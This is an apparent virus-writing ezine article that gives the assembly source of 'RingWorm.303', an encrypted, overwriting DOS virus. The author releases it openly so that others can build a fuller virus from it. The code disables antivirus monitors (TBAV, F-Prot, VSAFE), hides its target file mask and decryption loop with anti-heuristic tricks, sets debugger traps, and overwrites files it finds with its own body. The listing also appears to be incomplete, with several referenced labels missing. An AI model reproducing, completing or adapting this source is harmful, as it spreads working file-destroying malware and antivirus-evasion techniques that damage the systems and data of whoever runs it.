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SLAM2.025: Anti-Tracing/Disassembling Techniques - The RingWorm.303 Virus

eZine's profile picture
Published in 
 · 23 Feb 2022

The RingWorm.303 Virus

I don't have any time to comment this virus, just let me say that it is firmly anti-heuristic, armoured, and has an interesting debugger / disassembler trap at the end of the decryption routine, see if you can find it... It is overwriting, because, again, I was testing the method, and didn't want to be bothered with a feature-full virus; if the method worked, which it does, I was to write a cool virus... Unfortunately, I haven't the time right now, so I am releasing this code so that you can. The two instructions to watch are:

  mov     ax, 0FFEBh 
jcxz $ - 2

Trace the jumps through with debug, you don't have to run it, just 'u' the jump addresses until you see what it does. See the Airwalker viruses for most of the anti-heuristic tricks used in this baby; as for the rest, just enjoy...

==========================================================[ code begins ]== 

.model tiny

org 100h

mov ax, offset decrypt
call ax

xchg ax, cx
mov es, ax

mov word ptr es:[1h*4], offset my_int1
mov word ptr es:[1h*4+2], cs

mov word ptr es:[3h*4], offset my_int3
mov word ptr es:[3h*4+2], cs

push cs
pop es

mov ax, 0CA02h
xor bl, bl
int 2Fh ; disable TBAV's TBSCANX

cli ; clear maskable interrupts

neg sp ; disable TBAV - this code
neg sp ; emulates a stack crash

sti ; set maskable interrupts

mov cl, 02h
call anti_fprot ; disable F-Prot v1.x F-LOCK

mov cl, 03h
call anti_fprot ; disable F-Prot v1.x F-XCHK

mov cl, 04h
call anti_fprot ; disable F-Prot v1.x F-XPOPUP

mov cl, 05h
call anti_fprot ; disable F-Prot v1.x F-DLOCK

mov cl, 07h ; disable F-Prot v2.x VIRSTOP
call anti_fprot ; boot sector checking

mov ax, 0FA01h ; wakes up VSAFE to keyboard
mov dx, 5945h ; asks VSAFE to de-install
int 16h ; call VSAFE-hooked interrupt

; ===========================================================================
; AVP v3.0 build 107 update 03/22/97 will detect the following anti-heuristic
; code segment, but not if you xor a word on the stack:
; xor word ptr [file_mask + 2], 1717h
; xor byte ptr [file_mask + 4], 19h
; ===========================================================================

push word ptr [file_mask + 2]
mov bx, sp
xor word ptr [bx], 1717h
pop word ptr [file_mask + 2]
xor byte ptr [file_mask + 4], 19h

mov ah, 4Eh ; ah = 4Eh, find first file
xor cx, cx
mov dx, offset file_mask ; points to `*.com'
int 21h ; do it!

jc exit_virus ; exit if no files found

mov ax, 3D02h ; open file for read/write
mov dx, 09Eh ; location of filename in psp
int 21h ; do it!

xchg bx, ax ; put filehandle in bx

mov ah, 3Fh ; read file from handle in bx
mov cx, 01h ; number of bytes to read
mov dx, offset heap ; read byte to heap
int 21h ; do it!

cmp byte ptr [heap], 0B8h ; compare to `mov ax' opcode
je next_file ; if infected, find next file

xor word ptr [file_mask + 2], 1717h
xor byte ptr [file_mask + 4], 19h

mov si, offset write_virus
mov di, offset heap + 0001h
mov cx, offset end_write_virus - offset write_virus
rep movsb

mov ah, 2Ch ; ah = 2Ch, dos get time
int 21h ; do it!
mov word ptr[encrypt_key], dx ; key = dx = seconds:100ths

mov ax, 4200h ; reset file pointer to top
xor cx, cx ; mov cx, 0000h in 2 bytes
cwd ; mov dx, 0000h in 1 byte
int 21h ; do it!

mov ah, 40h ; write file from handle bx
mov cx, virus_end - virus_start ; number of bytes to write
mov dx, offset virus_start ; start writing from cs:100h

jmp heap + 0001h

int 20h ; we're outta here...

mov ah, 3Eh ; ah = 3Eh, close file
int 21h ; do it!

mov ah, 4Fh ; ah = 4Fh, find next file
int 21h ; do it!

jmp find_file

mov ax, offset decrypt
call ax
int 21h ; write the bitch!

mov ah, 3Eh ; ah = 3Eh, close file
int 21h ; do it!

int 20h

end_write_virus equ $

virus_name db '[ringworm]', 00h
virus_author db '(c) 1997 gothmog', 00h

; ===========================================================================
; S Contains a routine to search for executable (.COM or .EXE) files.
; file_mask db '*.com', 00h
; ===========================================================================

file_mask db '*.txt', 00h

mov ax, 4653h
mov bx, 0001h
xor ch, ch
int 2Fh

end_encrypt equ $ - 0001h

call my_int1

call my_int3

mov si, offset start_encrypt
mov di, si
xor bx, bx
push bx ; zero has to be on stack for zeroing cx below

; (this is done real crazy to be hard to trace, and also very anti-heuristic;
; nothing recognizes this entire structure as a decryption loop at all...)

mov bx, offset false_jump_2 ; see note below
mov cx, (end_encrypt - start_encrypt + 1) / 2

jnc false_jump

pop ax
pop cx
loop xor_loop
pop ax

db 35h

encrypt_key dw 0000

pop dx
push dx
push cx
push ax
xchg cx, dx
mov ax, 0FFEBh ; <----------------- debugger trap, with next line
jcxz $ - 2 ; (actually executes a jmp bx instruction)

call my_int1

virus_end equ $


end virus_start

; ============================================================[ code ends ]==

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